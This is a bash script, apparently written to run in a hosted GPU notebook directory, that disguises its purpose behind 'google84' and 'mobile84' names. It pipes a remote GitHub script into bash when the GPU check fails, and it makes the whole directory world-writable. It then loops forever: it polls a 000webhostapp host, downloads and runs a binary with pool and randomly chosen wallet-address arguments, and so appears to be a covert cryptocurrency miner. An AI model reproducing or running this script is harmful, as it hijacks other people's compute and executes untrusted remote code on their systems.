apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

cd /notebooks/

google84121274=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if [[ $google84121274 == *"failed"* ]]; then

curl https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/google8412127474 | bash

else

while true
do

arr[0]="4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6"
arr[1]="36emHJrD7TjVnbrvJzpooocHD2vnEMZHjHMm3kk3tMpMhPgw5NfYPtZEiu6nBJjeJi21vwLAD2d5afKDRiJPeQKW"
arr[2]="4migato2bH4mdWUVMWTrUC49bCGARNnqR1YAteUJ3tEJVobjrooSa6NqK2Uwehu9WFtpLwwEmcwT63Xcphun1bwj"
arr[3]="xZDcVyJeLLxqqsn6CeygQMR5zBTi9Gfk1d7XG3rj7WmypGrqRVBXWHg3WMk7yNfpbXnw85LBzY6j42F4qgpJRUP"
arr[4]="2z2hwRPjLrQoN3UBsCX4EMRQxdcMxMFsQeJkUnZvgGXZnAsG2dBf3FXZdrk9stxzgd2Hrzdy8HxQb6AGFEEa5xkk"
arr[5]="28xqj4rxaoBfMeHnCb9gS9t3ezWMvPZ34qYhD4Tu5iSZhEpc3Q6cZYWowgyLuSqsAnbsy2Dw3cNjWR3A6WMnGoa2"
arr[6]="45rqQs8nm37XEtzK38aSJyDiyXXDKCtkFhbM7WtFGAATBLqAHq1CE9HyZZ7V4wtQ94qZPQbJ89mQgyXcS8XRWUB9"
arr[7]="2tmy46jHQHTjMEsvgEz3BMMCnVcER97gqenr1zqzhpwd3VaiN1nS6m8eK8WTiNhXyHJBWS1FgZBpy2Ew5xxQ4Tio"
rand=$[$RANDOM % ${#arr[@]}]
google84121212121212121274=${arr[$rand]}

chmod -R 777 ./

cd /notebooks/

google841212121274="https://workjob84.000webhostapp.com/"

google84="26884"

string=$(curl -s -A "mobile84" https://workjob84.000webhostapp.com/?work=workjob)
if [[ $string == *"16384"* ]]; then

cd /notebooks/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/google84121274.tar.gz
tar -xvf ./google84121274.tar.gz

cd google84121274

if (($google84 >= 16888 && $google84 <= 34884))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 448
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 14884 && $google84 <= 16884))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 374
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 248
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 184
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 148
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 1884 && $google84 <= 2488))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 84
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi



else

chmod -R 777 ./

cd /notebooks/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googleapps84121274.tar.gz
tar -xvf ./googleapps84121274.tar.gz

cd googleapps84121274

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

google84="26884"

if (($google84 >= 16888 && $google84 <= 34884))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 22
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (( $google84 >= 14884 && $google84 <= 16884 ))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 12
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 8
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 4
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 1884 && $google84 <= 5184))
then

timeout 14 ./google84 -p $google841212121274 -a $google84121212121212121274 -t 1 -b 4
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

fi

done

fi
